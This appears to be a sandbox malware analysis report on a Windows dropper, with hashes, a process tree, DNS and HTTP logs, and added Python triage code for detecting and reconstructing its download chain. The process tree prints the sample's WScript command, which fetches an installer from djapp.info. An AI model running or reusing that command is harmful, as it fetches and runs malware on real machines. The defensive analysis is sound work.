Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240508-en locale:en-us os:windows7-x64 system
  • submitted
    04 Jun 2024, 18:53 UTC

General

  • Target

    95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    95ea46ab8eb07da6eac0319ab27699b4

  • SHA1

    308a221a64df731bc53eacb6d6d2780f69003dfb

  • SHA256

    0c7538a10638b146d638d440e86e264ef7b6070efce97f1d07886a43c2078abb

  • SHA512

    331814c2b762931ab6dd2c8cc21259a642cd27926ea10c1d10cfe39141f23db6786a3391fb38ef26b17dba4a9354171c1ea3165e3fa9598b47f6e9cb3d7ccc37

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3f:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 11 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:1336
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:2520
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:2860
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:276
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1304.exe
      2⤵
      • Blocklisted process makes network request
      PID:1912
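
The process tree shows the dropper writing fuf1304.js to %TEMP% and launching it five times through the 32-bit WScript.exe (the SysWOW64 copy, because the dropper is x86), each time passing a tracking URL and the path of the installer it is meant to save. The Python below is an added triage check, not code from the report or from the sample: it splits the Windows command line, flags script-host launches whose parent and script both live in %TEMP% with a URL and an .exe path on the command line, and decodes the affiliate parameters (pub_id, setup_id, the domain and ip fields) from the URL. The event records are constructed from the PIDs and command lines above; the field names, the explorer.exe parent assumed for the first process, and the benign logon-script control event are this example's own assumptions.

```python
"""Triage helper for the WScript.exe launch pattern shown in the process tree above."""
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed process-creation records modelled on the process tree above.
# PIDs and command lines are copied from the report; the field names mirror
# Sysmon Event ID 1 and are an assumption, as is the explorer.exe parent of the
# first process (the report does not show it) and the benign control event.
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\95ea46ab8eb07da6eac0319ab27699b4_JaffaCakes118.exe"
EVENTS = [
    {
        "pid": 2084,
        "image": DROPPER,
        "parent_image": r"C:\Windows\explorer.exe",  # assumed
        "command_line": f'"{DROPPER}"',
    },
    {
        "pid": 1336,
        "image": r"C:\Windows\SysWOW64\WScript.exe",
        "parent_image": DROPPER,
        "command_line": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1304.js" '
                        r"http://www.djapp.info/?domain=kObBSMoILw.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 "
                        r"C:\Users\Admin\AppData\Local\Temp\fuf1304.exe",
    },
    {   # benign control: a logon script run from the domain's NETLOGON share (constructed)
        "pid": 4100,
        "image": r"C:\Windows\System32\WScript.exe",
        "parent_image": r"C:\Windows\System32\userinit.exe",
        "command_line": r'"C:\Windows\System32\WScript.exe" "\\corp\netlogon\map_drives.vbs"',
    },
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf")


def split_windows_cmdline(cmdline: str) -> list:
    """Split on whitespace while honouring double quotes.
    Not a full CommandLineToArgvW clone (no backslash escapes), which is enough here."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"]*)"|(\S+)', cmdline)]


def analyse_script_host_launch(event: dict) -> Optional[dict]:
    """Return findings for a wscript/cscript launch, or None if the event is not one."""
    if event["image"].lower().rsplit("\\", 1)[-1] not in SCRIPT_HOSTS:
        return None
    argv = split_windows_cmdline(event["command_line"])[1:]  # drop the host exe itself
    script = next((a for a in argv if a.lower().endswith(SCRIPT_EXTS)), None)
    urls = [a for a in argv if a.lower().startswith(("http://", "https://"))]
    exe_args = [a for a in argv if a.lower().endswith(".exe")]

    reasons = []
    if TEMP_DIR.search(event["parent_image"]):
        reasons.append("parent runs from %TEMP%")
    if script and TEMP_DIR.search(script):
        reasons.append("script lives in %TEMP%")
    if urls:
        reasons.append("URL passed on the command line")
    if exe_args:
        reasons.append(".exe path passed as an argument (drop target)")

    return {
        "pid": event["pid"],
        "script": script,
        "urls": urls,
        "exe_args": exe_args,
        # affiliate / install-tracking parameters carried in any URL argument
        "url_params": {u: {k: v[0] for k, v in parse_qs(urlsplit(u).query).items()} for u in urls},
        "reasons": reasons,
        "suspicious": len(reasons) >= 2,
    }


def triage(events: list) -> list:
    """Script-host launches that trip at least two of the indicators above."""
    return [f for f in map(analyse_script_host_launch, events) if f and f["suspicious"]]


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(hit["pid"], hit["reasons"])
        for url, params in hit["url_params"].items():
            print("  ", url, "->", params)
```

The two-indicator threshold keeps the control event (a logon script from NETLOGON with no URL or drop path) below the bar while the sample's launch trips all four; tune it against your own baseline of script-host usage before deploying it as a rule.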

Network

  • flag-us
    DNS
    www.djapp.info
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.djapp.info
    IN A
    Response
  • flag-us
    DNS
    bi.downthat.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    bi.downthat.com
    IN A
    Response
    bi.downthat.com
    IN CNAME
    traff-5.hugedomains.com
    traff-5.hugedomains.com
    IN CNAME
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    IN A
    34.205.242.146
    hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
    IN A
    54.161.222.85
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:53:52 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    DNS
    www.hugedomains.com
    WScript.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hugedomains.com
    IN A
    Response
    www.hugedomains.com
    IN A
    104.26.6.37
    www.hugedomains.com
    IN A
    104.26.7.37
    www.hugedomains.com
    IN A
    172.67.70.191
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:53:53 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: site_version_phase=108; expires=Fri, 30-May-2025 18:53:53 GMT; path=/
    set-cookie: site_version=HDv3; expires=Fri, 30-May-2025 18:53:53 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVEbKm4Pm3brrrm9UXgIom21ZTyQNKibkXIX%2FZaj7Y5ANDZJsmna%2FdNyYG2slESQ9uIl9ciiHIIeSYijg4qgyfMAawOy05xTocQCXXEA19e4ncso4b7NTOR%2BW%2FTMhoGSt27z0BQ%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea20d84d179584-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:53:59 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:00 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Mon, 03-Jun-2024 18:54:00 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVgwu3r0Wp5U8c599o5QfOuDa3wIpoR5JU05RjqpYS%2FCSkLnrL7lOFvjSLweTLaR9SBqmr99DUnzMOhfYI8EqY9gDy1FGoVdhXOGHj2K0CE%2Fb1dKyh71Rxtpe8wc%2FFLTwvFpiwE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea2101d88693e4-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:54:05 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:06 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Mon, 03-Jun-2024 18:54:06 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WPRMpKMlOsTQs0Q7VazUCXWNSA%2BZHtY9veUY9KuEKo4SiACson6paaFv%2FG1CxUITmu2uyQwA2LsADH2b4qxCqyil06SxKJ3Zai0KQlJcDBb0D8uoEy2DF%2BAd%2BeDUHo4BRr%2FbEgs%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea21291aec60fe-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:54:11 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:12 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    set-cookie: captcha-tracker=; expires=Mon, 03-Jun-2024 18:54:12 GMT; path=/
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01c619wNr5JVegrL8vU6DwcvSaxszZinnshe7My5ffxahx%2FOIgg2YNZNRK8JZu8myAnt39VcIolWFd%2FnDiJiS2lM%2BUt173bh086QAtmmKjBSVuG8Fbv4G2wQKN%2F8PU3eApxGJto%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea214ff9032408-LHR
    Content-Encoding: gzip
  • flag-us
    GET
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    WScript.exe
    Remote address:
    34.205.242.146:80
    Request
    GET /?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl= HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: bi.downthat.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    content-length: 0
    date: Tue, 04 Jun 2024 18:54:17 GMT
    location: https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
  • flag-us
    GET
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    WScript.exe
    Remote address:
    104.26.6.37:443
    Request
    GET /domain_profile.cfm?d=downthat.com HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Cookie: site_version_phase=108; site_version=HDv3
    Connection: Keep-Alive
    Host: www.hugedomains.com
    Response
    HTTP/1.1 200 OK
    Date: Tue, 04 Jun 2024 18:54:18 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    cache-control: private
    vary: Accept-Encoding
    x-powered-by: ASP.NET
    lb: TclPrdLbHd3
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDo1%2FLu6i4hdaIjs2W2BQWC%2Fzl3yj%2BOXavh3UBT8CbuHo2eIyQlB%2FVIMrUqaIgt3MtdHcFMLhgTzWpkJ6LP5fzcQjeTmvm4RvNj5x7%2BEwa6%2FQccTUtNGfyp3iKX9KjcAjkieM0g%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 88ea2176cf486367-LHR
    Content-Encoding: gzip
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
    16.5kB
    15
    22

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    708 B
    430 B
    6
    3

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.2kB
    11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.7kB
    11
    14

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.3kB
    9.1kB
    11
    13

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 34.205.242.146:80
    http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=
    http
    WScript.exe
    660 B
    243 B
    5
    2

    HTTP Request

    GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

    HTTP Response

    302
  • 104.26.6.37:443
    https://www.hugedomains.com/domain_profile.cfm?d=downthat.com
    tls, http
    WScript.exe
    1.4kB
    16.1kB
    14
    19

    HTTP Request

    GET https://www.hugedomains.com/domain_profile.cfm?d=downthat.com

    HTTP Response

    200
  • 8.8.8.8:53
    www.djapp.info
    dns
    WScript.exe
    60 B
    139 B
    1
    1

    DNS Request

    www.djapp.info

  • 8.8.8.8:53
    bi.downthat.com
    dns
    WScript.exe
    61 B
    191 B
    1
    1

    DNS Request

    bi.downthat.com

    DNS Response

    34.205.242.146
    54.161.222.85

  • 8.8.8.8:53
    www.hugedomains.com
    dns
    WScript.exe
    65 B
    113 B
    1
    1

    DNS Request

    www.hugedomains.com

    DNS Response

    104.26.6.37
    104.26.7.37
    172.67.70.191
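
Read together, the DNS and HTTP records explain why no second-stage installer appears among the dropped files: the query for www.djapp.info returned no address, the script then reported the failure to bi.downthat.com (script_error4=1, the Windows error text as a bare query token, and an empty downloadurl=), and that host answered with a 302 into a HugeDomains parking page, which the script followed, once per launch. The error text is the INET_E_RESOURCE_NOT_FOUND message that MSXML's XMLHTTP raises when the request host cannot be reached or resolved, so it is consistent with the empty DNS answer. The Python below is an added example, not code from the report: it reconstructs that chain from constructed records carrying the values shown above, decodes the beacon query string while keeping the blank-valued tokens that parse_qs drops by default, marks hosts that redirect into a parking page, and returns whether the download stage failed. The record layout and the parking-host list are this example's own assumptions.

```python
"""Reconstruct the failed download chain from the DNS and HTTP records above."""
from urllib.parse import parse_qs, urlsplit

# Constructed records with the values from the network section of this report.
# Field names are this example's own, not the sandbox's export schema.
DNS = {
    "www.djapp.info": [],  # queried, but no A record in the answer shown
    "bi.downthat.com": ["34.205.242.146", "54.161.222.85"],
    "www.hugedomains.com": ["104.26.6.37", "104.26.7.37", "172.67.70.191"],
}
HTTP = [
    {
        "url": "http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=",
        "status": 302,
        "location": "https://www.hugedomains.com/domain_profile.cfm?d=downthat.com",
    },
    {
        "url": "https://www.hugedomains.com/domain_profile.cfm?d=downthat.com",
        "status": 200,
        "location": None,
    },
]
# Registrar parking front-ends: an assumed starter list, extend it from your own telemetry.
PARKING_HOSTS = {"www.hugedomains.com"}
# Query keys the beacon sends with an empty value by design, so they are not the error text.
KNOWN_EMPTY_KEYS = {"downloadurl"}


def decode_beacon(url: str) -> dict:
    """Decode the error-report query string.

    The script appends the Windows error text as a bare token with no '=', so after
    parsing it shows up as a key whose value is empty. keep_blank_values=True keeps
    both that token and the empty downloadurl= from being silently dropped.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    params = {k: v[0] for k, v in query.items()}
    message = next((k for k, v in params.items() if v == "" and k not in KNOWN_EMPTY_KEYS), None)
    return {
        "is_error_report": any(k.startswith("script_error") for k in params),
        "message": message,
        "download_url": params.get("downloadurl", ""),
        "params": params,
    }


def assess_chain(dns: dict, http: list) -> dict:
    """Combine DNS answers and HTTP exchanges into a verdict on the download stage."""
    unresolved = sorted(host for host, answers in dns.items() if not answers)
    beacons, parked = [], set()
    for tx in http:
        host = urlsplit(tx["url"]).hostname
        beacon = decode_beacon(tx["url"])
        if beacon["is_error_report"]:
            beacons.append({"host": host, "message": beacon["message"],
                            "download_url": beacon["download_url"]})
        # A redirect into a registrar's parking page means the host no longer serves the campaign.
        if tx["status"] in (301, 302, 307, 308) and tx["location"]:
            if urlsplit(tx["location"]).hostname in PARKING_HOSTS:
                parked.add(host)
    download_failed = bool(unresolved) or any(
        b["message"] or not b["download_url"] for b in beacons
    )
    return {
        "unresolved": unresolved,
        "beacons": beacons,
        "parked": sorted(parked),
        "download_failed": download_failed,
    }


if __name__ == "__main__":
    verdict = assess_chain(DNS, HTTP)
    print("download stage failed:", verdict["download_failed"])
    print("unresolved hosts:", verdict["unresolved"])
    for b in verdict["beacons"]:
        print(f"error beacon to {b['host']}: {b['message']!r}, downloadurl={b['download_url']!r}")
    print("hosts parked at a registrar:", verdict["parked"])
```

A verdict of "download failed" here says the sandbox run did not reach the payload, not that the sample is harmless: the affiliate URL and the hashes above are still the indicators to block, and a fresh domain in the dropper's configuration would change the outcome.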

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    493936daab236ff01eddcad61725cd7b

    SHA1

    77b9225f2e92feae8ab10eff979d7f2986a107a8

    SHA256

    2a626183018a8d4b572c01fe5eb0bcb82d8b36b74694c7cb9ae47735b19ff92b

    SHA512

    d73f9f2f7b223a1a368771c45ed6eb7c02fd5386f6c2594edc94f646094f8aca758c81b1656bf7a1ff72f8e171b8b50bb5a2183d08113705c6fa7a2ae710960f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    cd24833c9eecd6d04408050bc37a34a8

    SHA1

    d867ccdb45df9a05d896779010cd493a35706066

    SHA256

    62ee4eab70c7e4f5364127545402a2fb18b536916749a080accc90c120820de3

    SHA512

    54c48508c346276ad770fa1a3476c929ecd956d011a7fdc3de00424685611941fdfb8f8cf1535abfb569ac353f49737d1f797ce63a41063adca0ea35152a30e3

